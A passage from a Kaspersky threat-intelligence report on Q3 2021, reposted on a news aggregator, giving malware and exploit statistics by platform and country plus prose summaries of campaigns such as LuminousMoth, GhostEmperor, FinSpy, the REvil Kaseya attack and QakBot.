The share of exploits for the popular browsers fell by 3 p.p. from the previous reporting period to 25.57% in Q3. In the three months covered by the report several vulnerabilities were discovered in Google Chrome browser and its script engine V8 — some of them in the wild. Among these, the following JavaScript engine vulnerabilities stand out: CVE-2021-30563 (type confusion error corrupting the heap memory), CVE-2021-30632 (out-of-bounds write in V8) and CVE-2021-30633 (use-after-free in Indexed DB). All these can potentially allow remote execution of code. But it should be remembered that for modern browsers a chain of several exploits is often required to leave the sandbox and secure broader privileges in the system. It should also be noted that with Google Chromium codebase (in particular the Blink component and V8) being used in many browsers, any newly detected Google Chrome vulnerability automatically makes other browsers built with its open codebase vulnerable.

The third place if held by Google Android vulnerabilities (5.36%) — 1 p.p. down from the previous period. They are followed by exploits for Adobe Flash (3.41%), their share gradually decreasing. The platform is no longer supported but is still favored by users, which is reflected in our statistics.

Our ranking is rounded out by vulnerabilities for Java (2.98%), its share also noticeably lower, and Adobe PDF (1.98%).

Attacks on macOS

We will remember Q3 2021 for the two interesting revelations. The first one is the use of malware code targeting macOS as part of the WildPressure campaign. The second is the detailed review of the previously unknown FinSpy implants for macOS.

Speaking of the most widespread threats detected by Kaspersky security solutions for macOS, most of our Top 20 ranking positions are occupied by various adware apps. Among the noteworthy ones is Monitor.OSX.HistGrabber.b (second place on the list) — this potentially unwanted software sends user browser history to its owners’ servers.

Top 20 threats for macOS

Verdict %* 1 AdWare.OSX.Pirrit.j 13.22 2 Monitor.OSX.HistGrabber.b 11.19 3 AdWare.OSX.Pirrit.ac 10.31 4 AdWare.OSX.Pirrit.o 9.32 5 AdWare.OSX.Bnodlero.at 7.43 6 Trojan-Downloader.OSX.Shlayer.a 7.22 7 AdWare.OSX.Pirrit.gen 6.41 8 AdWare.OSX.Cimpli.m 6.29 9 AdWare.OSX.Bnodlero.bg 6.13 10 AdWare.OSX.Pirrit.ae 5.96 11 AdWare.OSX.Agent.gen 5.65 12 AdWare.OSX.Pirrit.aa 5.39 13 Trojan-Downloader.OSX.Agent.h 4.49 14 AdWare.OSX.Bnodlero.ay 4.18 15 AdWare.OSX.Ketin.gen 3.56 16 AdWare.OSX.Ketin.h 3.46 17 Backdoor.OSX.Agent.z 3.45 18 Trojan-Downloader.OSX.Lador.a 3.06 19 AdWare.OSX.Bnodlero.t 2.80 20 AdWare.OSX.Bnodlero.ax 2.64

* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked.

Geography of threats for macOS

Geography of threats for macOS, Q3 2021 (download)

Top 10 countries by share of attacked users

Country* %** 1 France 3.05 2 Spain 2.85 3 India 2.70 4 Mexico 2.59 5 Canada 2.52 6 Italy 2.42 7 United States 2.37 8 Australia 2.23 9 Brazil 2.21 10 United Kingdom 2.12

* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000).
** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country.

In Q3 2021, France took the lead having the greatest percentage of attacks on users of Kaspersky security solutions (3.05%), with the potentially unwanted software Monitor.OSX.HistGrabber being the prevalent threat there. Spain and India came in second and third, with the Pirrit family adware as their prevalent threat.

IoT attacks IoT threat statistics

In Q3 2021, most of the devices that attacked Kaspersky honeypots did so using the Telnet protocol. Just less than a quarter of all devices attempted brute-forcing our traps via SSH.

Telnet 76.55% SSH 23.45%

Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q3 2021

The statistics for working sessions with Kaspersky honeypots show similar Telnet dominance.

Telnet 84.29% SSH 15.71%

Distribution of cybercriminal working sessions with Kaspersky traps, Q3 2021

Top 10 threats delivered to IoT devices via Telnet

Verdict %* 1 Backdoor.Linux.Mirai.b 39.48 2 Trojan-Downloader.Linux.NyaDrop.b 20.67 3 Backdoor.Linux.Agent.bc 10.00 4 Backdoor.Linux.Mirai.ba 8.65 5 Trojan-Downloader.Shell.Agent.p 3.50 6 Backdoor.Linux.Gafgyt.a 2.52 7 RiskTool.Linux.BitCoinMiner.b 1.69 8 Backdoor.Linux.Ssh.a 1.23 9 Backdoor.Linux.Mirai.ad 1.20 10 HackTool.Linux.Sshbru.s 1.12

* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats.

Detailed IoT threat statistics are published in our Q3 2021 DDoS report: https://securelist.com/ddos-attacks-in-q3-2021/104796/#attacks-on-iot-honeypots

Attacks via web resources

The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose and web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected.

Countries that serve as sources of web-based attacks: Top 10

The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks.

To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted.

In Q3 2021, Kaspersky solutions blocked 1,098,968,315 attacks launched from online resources located across the globe. Web Anti-Virus recognized 289,196,912 unique URLs as malicious.

Distribution of web-attack sources by country, Q3 2021 (download)

Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious programs that fall under the Malware class; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of attacked users** 1 Tunisia 27.15 2 Syria 17.19 3 Yemen 17.05 4 Nepal 15.27 5 Algeria 15.27 6 Macao 14.83 7 Belarus 14.50 8 Moldova 13.91 9 Madagascar 13.80 10 Serbia 13.48 11 Libya 13.13 12 Mauritania 13.06 13 Mongolia 13.06 14 India 12.89 15 Palestine 12.79 16 Sri Lanka 12.76 17 Ukraine 12.39 18 Estonia 11.61 19 Tajikistan 11.44 20 Qatar 11.14

* Excluded are countries with relatively few Kaspersky users (under 10,000).
** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky products in the country.

These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data.

On average during the quarter, 8.72% of computers of Internet users worldwide were subjected to at least one Malware-class web attack.

Geography of web-based malware attacks, Q3 2021 (download)

Local threats

In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users’ computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.).

In Q3 2021, our File Anti-Virus detected 62,577,326 malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

Note that this rating only includes attacks by malicious programs that fall under the Malware class; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

Country* % of attacked users** 1 Turkmenistan 47.42 2 Yemen 44.27 3 Ethiopia 42.57 4 Tajikistan 42.51 5 Uzbekistan 40.41 6 South Sudan 40.15 7 Afghanistan 40.07 8 Cuba 38.20 9 Bangladesh 36.49 10 Myanmar 35.96 11 Venezuela 35.20 12 China 35.16 13 Syria 34.64 14 Madagascar 33.49 15 Rwanda 33.06 16 Sudan 33.01 17 Benin 32.68 18 Burundi 31.88 19 Laos 31.70 20 Cameroon 31.28

* Excluded are countries with relatively few Kaspersky users (under 10,000).
** Unique users on whose computers Malware-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country.

Geography of local infection attempts, Q3 2021 (download)

On average worldwide, Malware-class local threats were recorded on 15.14% of users’ computers at least once during the quarter. Russia scored 14.64% in this rating.

IT threat evolution Q3 2021

Kaspersky Securelist - 26 Listopad, 2021 - 13:00

Targeted attacks WildPressure targets macOS

Last March, we reported a WildPressure campaign targeting industrial-related entities in the Middle East. While tracking this threat actor in spring 2021, we discovered a newer version. It contains the C++ Milum Trojan, a corresponding VBScript variant and a set of modules that include an orchestrator and three plugins. This confirms our previous assumption that there were more last-stagers besides the C++ ones.

Another language used by WildPressure is Python. The PyInstaller module for Windows contains a script named “Guard”. Interestingly, this malware was developed for both Windows and macOS operating systems. The coding style, overall design and C2 communication protocol is quite recognizable across all three programming languages used by the authors.

WildPressure used both virtual private servers (VPS) and compromised servers in its infrastructure, most of which were WordPress websites.

We have very limited visibility for the samples described in our report, but our telemetry suggests that the targets in this campaign were also from the oil and gas industry.

You can view our report on the new version here, together with a video presentation of our findings.

LuminousMoth: sweeping attacks for the chosen few

We recently uncovered a large-scale and highly active attack against targets in Southeast Asia by a threat actor that we call LuminousMoth. The campaign dates back to October last year and was still ongoing at the time we published our public report in July. Most of the early sightings were in Myanmar, but it seems the threat actor is now much more active in the Philippines. Targets include high-profile organizations: namely, government entities located both within those countries and abroad.

Most APT threats carefully select their targets and tailor the infection vectors, implants and payloads to the victims’ identities or environment. It’s not often we observe a large-scale attack by APT threat actors – they usually avoid such attacks because they are too ‘noisy’ and risk drawing attention to the campaign. LuminousMoth is an exception. We observed a high number of infections; although we think the campaign was aimed at a few targets of interest.

The attackers obtain initial access to a system by sending a spear-phishing email to the victim containing a Dropbox download link. The link leads to a RAR archive that masquerades as a Word document. The archive contains two malicious DLL libraries as well as two legitimate executables that side-load the DLL files. We found multiple archives like this with file names of government entities linked to Myanmar.

We also observed a second infection vector that comes into play after the first one has successfully finished. The malware tries to spread to other hosts on the network by infecting USB drives.

In addition to the malicious DLLs, the attackers also deployed a signed, but fake version of the popular application Zoom on some infected systems, enabling them to exfiltrate data.

The threat actor also deploys an additional tool that accesses a victim’s Gmail session by stealing cookies from the Chrome browser.

Infrastructure ties as well as shared TTPs allude to a possible connection between LuminousMoth and the HoneyMyte threat group, which has been seen targeting the same region using similar tools in the past.

Targeted attacks exploiting CVE-2021-40444

On September 7, Microsoft reported a zero-day vulnerability (CVE-2021-40444) that could allow an attacker to execute code remotely on vulnerable computers. The vulnerability is in MSHTML, the Internet Explorer engine. Even though few people use IE nowadays, some programs use its engine to handle web content – in particular, Microsoft Office applications.

We have seen targeted attacks exploiting the vulnerability to target companies in research and development, the energy sector and other major industries, banking, the medical technology sector, as well as telecoms and IT.

To exploit the vulnerability, attackers embed a special object in a Microsoft Office document containing a URL for a malicious script. If the victim opens the document, Microsoft Office downloads the script and runs it using the MSHTML engine. Then the script can use ActiveX controls to perform malicious actions on the victim’s computer.

Tomiris backdoor linked to SolarWinds attack

The SolarWinds incident last December stood out because of the extreme carefulness of the attackers and the high-profile nature of their victims. The evidence suggests that the threat actor behind the attack, DarkHalo (aka Nobelium), had spent six months inside OrionIT’s networks to perfect their attack. The following timeline sums up the different steps of the campaign.

In June, more than six months after DarkHalo had gone dark, we observed the DNS hijacking of multiple government zones of a CIS member state that allowed the attacker to redirect traffic from government mail servers to computers under their control – probably achieved by obtaining credentials to the control panel of the victims’ registrar. When victims tried to access their corporate mail, they were redirected to a fake copy of the web interface.

After this, they were tricked into downloading previously unknown malware. The backdoor, dubbed Tomiris, bears a number of similarities to the second-stage malware, Sunshuttle (aka GoldMax), used by DarkHalo last year. However, there are also a number of overlaps between Tomiris and Kazuar, a backdoor that has been linked to the Turla APT threat actor. None of the similarities is enough to link Tomiris and Sunshuttle with sufficient confidence. However, taken together they suggest the possibility of common authorship or shared development practices.

You can read our analysis here.

GhostEmperor

Earlier this year, while investigating the rise of attacks against Exchange servers, we noticed a recurring cluster of activity that appeared in several distinct compromised networks. We attribute the activity to a previously unknown threat actor that we have called GhostEmperor. This cluster stood out because it used a formerly unknown Windows kernel mode rootkit that we dubbed Demodex; and a sophisticated multi-stage malware framework aimed at providing remote control over the attacked servers.

The rootkit is used to hide the user mode malware’s artefacts from investigators and security solutions, while demonstrating an interesting loading scheme involving the kernel mode component of an open-source project named Cheat Engine to bypass the Windows Driver Signature Enforcement mechanism.

We identified multiple attack vectors that triggered an infection chain leading to the execution of the malware in memory. The majority of GhostEmperor infections were deployed on public-facing servers, as many of the malicious artefacts were installed by the httpd.exe Apache server process, the w3wp.exe IIS Windows server process, or the oc4j.jar Oracle server process. This means that the attackers probably abused vulnerabilities in the web applications running on those systems, allowing them to drop and execute their files.

Although infections often start with a BAT file, in some cases the known infection chain was preceded by an earlier stage: a malicious DLL that was side-loaded by wdichost.exe, a legitimate Microsoft command line utility (originally called MpCmdRun.exe). The side-loaded DLL then proceeds to decode and load an additional executable called license.rtf. Unfortunately, we did not manage to retrieve this executable, but we saw that the consecutive actions of loading it included the creation and execution of GhostEmperor scripts by wdichost.exe.

This toolset was in use from as early as July 2020, mainly targeting Southeast Asian entities, including government agencies and telecoms companies.

FinSpy: analysis of current capabilities

At the end of September, at the Kaspersky Security Analyst Summit, our researchers provided an overview of FinSpy, an infamous surveillance toolset that several NGOs have repeatedly reported being used against journalists, political dissidents and human rights activists. Our analysis included not only the Windows version of FinSpy, but also Linux and macOS versions, which share the same internal structure and features.

After 2018, we observed falling detection rates for FinSpy for Windows. However, it never actually went away – it was simply using various first-stage implants to hide its activities. We started detecting some suspicious backdoored installer packages (including TeamViewer, VLC Media Player and WinRAR); then in the middle of 2019 we found a host that served these installers along with FinSpy Mobile implants for Android.

The authors have gone to great lengths to make FinSpy inaccessible to security researchers – it seems they have put as much work into anti-analysis and obfuscation as they have into the Trojan itself. First, the samples are protected with multiple layers of evasion tactics.

Moreover, once the Trojan has been installed, it is heavily camouflaged using four complex, custom-made obfuscators.

Apart from Trojanized installers, we also observed infections involving use of a UEFI (Unified Extensible Firmware Interface) and MBR (Master Boot Record) bootkit. While the MBR infection has been known since at least 2014, details on the UEFI bootkit were publicly revealed for the first time in our private report on FinSpy.

The user of a smartphone or tablet can be infected through a link in a text message. In some cases (for example, if the victim’s iPhone has not been not jailbroken), the attacker may need physical access to the device.

Other malware REvil attack on MSPs and their customers worldwide

An attack perpetrated by the REvil Ransomware-as-a-Service gang (aka Sodinokibi) targeting Managed Service Providers (MSPs) and their clients was discovered on July 2.

The attackers identified and exploited a zero-day vulnerability in the Kaseya Virtual System/Server Administrator (VSA) platform. The VSA software, used by Kaseya customers to remotely monitor and manage software and network infrastructure, is supplied either as a cloud service or via on-premises VSA servers.

The exploit involved deploying a malicious dropper via a PowerShell script. The script disabled Microsoft Defender features and then used the certutil.exe utility to decode a malicious executable (agent.exe) that dropped an older version of Microsoft Defender, along with the REvil ransomware packed into a malicious library. That library was then loaded by the legitimate MsMpEng.exe by utilizing the DLL side-loading technique.

The attack is estimated to have resulted in the encryption of files belonging to around 60 Kaseya customers using the on-premises version of the platform. Many of them were MSPs who use VSA to manage the networks of other businesses. This MSP connection gave REvil access to those businesses, and Kaseya estimated that around 1,500 downstream businesses were affected.

Using our Threat Intelligence service, we observed more than 5,000 attack attempts in 22 countries by the time our analysis of the attack was published.

What a [Print]Nightmare

Early in July, Microsoft published an alert about vulnerabilities in the Windows Print Spooler service. The vulnerabilities, CVE-2021-1675 and CVE-2021-34527 (aka PrintNightmare), can be used by an attacker with a regular user account to take control of a vulnerable server or client machine that runs the Windows Print Spooler service. This service is enabled by default on all Windows clients and servers, including domain controllers, making both vulnerabilities potentially very dangerous.

Moreover, owing to a misunderstanding between teams of researchers, a proof-of-concept (PoC) exploit for PrintNightmare was published online. The researchers involved believed that Microsoft’s Patch Tuesday release in June had already solved the problem, so they shared their work with the expert community. However, while Microsoft had published a patch for CVE-2021-1675, the PrintNightmare vulnerability remained unpatched until July. The PoC was quickly removed, but not before it had been copied multiple times.

CVE-2021-1675 is a privilege elevation vulnerability, allowing an attacker with low access privileges to craft and use a malicious DLL file to run an exploit and gain higher privileges. However, that is only possible if the attacker already has direct access to the vulnerable computer in question.

CVE-2021-34527 is significantly more dangerous because it is a remote code execution (RCE) vulnerability, which means it allows remote injection of DLLs.

You can find a more detailed technical description of both vulnerabilities here.

Grandoreiro and Melcoz arrests

In July, the Spanish Ministry of the Interior announced the arrest of 16 people connected to the Grandoreiro and Melcoz (aka Mekotio) cybercrime groups. Both groups are originally from Brazil and form part of the Tetrade umbrella, operating for a few years now in Latin America and Western Europe.

The Grandoreiro banking Trojan malware family initially started its operations in Brazil and then expanded its operations to other Latin American countries and then to Western Europe. The group has regularly improved its techniques; and, based on our analysis of the group’s campaigns, it operates as a malware-as-a-service (MaaS) project. Our telemetry shows that, since January 2020, Grandoreiro has mainly attacked victims in Brazil, Mexico, Spain, Portugal and Turkey.

Melcoz had been active in Brazil since at least 2018, before expanding overseas. We observed the group attacking assets in Chile in 2018 and, more recently, in Mexico: it’s likely that there are victims in other countries too, as some of the targeted banks have international operations. As a rule, the malware uses AutoIt or VBS scripts, added into MSI files, which run malicious DLLs using the DLL-Hijack technique, aiming to bypass security solutions. The malware steals passwords from browsers and from the device’s memory, providing remote access to capture internet banking access. It also includes a Bitcoin wallet stealing module. Our telemetry confirms that, since January 2020, Melcoz has been actively targeting Brazil, Chile and Spain, among other countries.

Since both malware families are from Brazil, the individuals arrested in Spain are just operators. So, it’s likely that the creators of Grandoreiro and Melcoz will continue to develop new malware techniques and recruit new members in their countries of interest.

Gamers beware

Earlier this year, we discovered an ad in an underground forum for a piece of malware dubbed BloodyStealer by its creators. The malware is designed to steal passwords, cookies, bank card details, browser auto-fill data, device information, screenshots, desktop and client uTorrent files, Bethesda, Epic Games, GOG, Origin, Steam, Telegram, and VimeWorld client sessions and logs.

The BloodyStealer ad (Source: https://twitter.com/3xp0rtblog)

The authors of the malware, which has hit users in Europe, Latin America and the Asia-Pacific region, have adopted a MaaS distribution model, meaning that anyone can buy it for the modest price of around $10 per month (roughly $40 for a “lifetime license”).

On top of its theft functions, the malware includes tools to thwart analysis. It sends stolen information as a ZIP archive to the C2 (command-and-control) server, which is protected against DDoS (distributed denial of service) attacks. The cybercriminals use either the (quite basic) control panel or Telegram to obtain the data, including gamer accounts.

BloodyStealer is just one of many tools available on the dark web for stealing gamer accounts. Moreover, underground forums often feature ads offering to post a malicious link on a popular website or selling tools to generate phishing pages automatically. Using these tools, cybercriminals can collect, and then try to monetize, a huge amount of credentials. All kinds of offers related to gamer accounts can be found on the dark web.

So-called logs are among the most popular. These are databases containing reams of data for logging into accounts. In their ads, attackers can specify the types of data, the geography of users, the period over which the logs were collected and other details. For example, in the screenshot below, an underground forum member offers an archive with 65,600 records, of which 9,000 are linked to users from the US, and 5,000 to residents of India, Turkey and Canada. The entire archive costs $150 (that’s about 0.2 cents per record).

Cybercriminals can also use compromised gaming accounts to launder money, distribute phishing links and conduct other illegal business.

You can read more about gaming threats, including BloodyStealer, here and here.

Triada Trojan in WhatsApp mod

Not everyone is happy with the official WhatsApp app, turning instead to modified WhatsApp clients for features that the WhatsApp developers haven’t yet implemented in the official version. The creators of these mods often embed ads in them. However, their use of third-party ad modules can provide a mechanism for malicious code to be slipped into the app unnoticed.

This happened recently with FMWhatsApp, a popular WhatsApp mod. In version 16.80.0 the developers used a third-party ad module that includes the Triada Trojan (detected by Kaspersky’s mobile antivirus as Trojan.AndroidOS.Triada.ef). This Trojan performs an intermediary function. First, it collects data about the user’s device, and then, depending on the information, it downloads one of several other Trojans. You can find a description of the functions that these other Trojans perform in our analysis of the infected FMWhatsApp mod.

Qakbot banking Trojan

QakBot (aka QBot, QuackBot and Pinkslipbot) is a banking Trojan that was first discovered in 2007, and has been continually maintained and developed since then. It is now one of the leading banking Trojans around the globe. Its main purpose is to steal banking credentials (e.g., logins, passwords, etc.), but it has also acquired functionality allowing it to spy on financial operations, spread itself and install ransomware in order to maximize revenue from compromised organizations.

The Trojan also includes the ability to log keystrokes, backdoor functionality, and techniques to evade detection. The latter includes virtual environment detection, regular self-updates and cryptor/packer changes. QakBot also tries to protect itself from being analyzed and debugged by experts and automated tools. Another interesting piece of functionality is the ability to steal emails: these are later used by the attackers to send targeted emails to the victims, with the information obtained used to lure victims into opening those emails.

QakBot is known to infect its victims mainly via spam campaigns. In some cases, the emails are delivered with Microsoft Office documents or password-protected archives with documents attached. The documents contain macros and victims are prompted to open the attachments with claims that they contain important information (e.g., an invoice). In some cases, the emails contain links to web pages distributing malicious documents.

However, there is another infection vector that involves a malicious QakBot payload being transferred to the victim’s machine via other malware on the compromised machine. The initial infection vectors may vary depending on what the threat actors believe has the best chance of success for the targeted organization(s). It’s known that various threat actors perform reconnaissance of target organizations beforehand to decide which infection vector is most suitable.

We analyzed statistics on QakBot attacks collected from our Kaspersky Security Network (KSN), where anonymized data voluntarily provided by Kaspersky users is accumulated and processed. In the first seven months of 2021 our products detected 181,869 attempts to download or run QakBot. This number is lower than the detection number from January to July 2020, though the number of users affected grew by 65% – from 10,493 in the previous year to 17,316 this year.

Number of users affected by QakBot attacks from January to July in 2020 and 2021 (download)

You can read our full analysis here.

Imunify360 Bug Leaves Linux Web Servers Open to Code Execution, Takeover>

LinuxSecurity.com - 26 Listopad, 2021 - 13:00
CloudLinux's security platform for Linux-based websites and web servers contains a high-severity PHP deserialization bug, leaving web servers vulnerable to code execution and tekeover.
Kategorie: Hacking & Security

Crypto Hackers Using Babadeda Crypter to Make Their Malware Undetectable

The Hacker News - 26 Listopad, 2021 - 11:32
A new malware campaign has been discovered targeting cryptocurrency, non-fungible token (NFT), and DeFi aficionados through Discord channels to deploy a crypter named "Babadeda" that's capable of bypassing antivirus solutions and stage a variety of attacks. "[T]his malware installer has been used in a variety of recent campaigns to deliver information stealers, RATs, and even LockBit ransomware,
Kategorie: Hacking & Security
Syndikovat obsah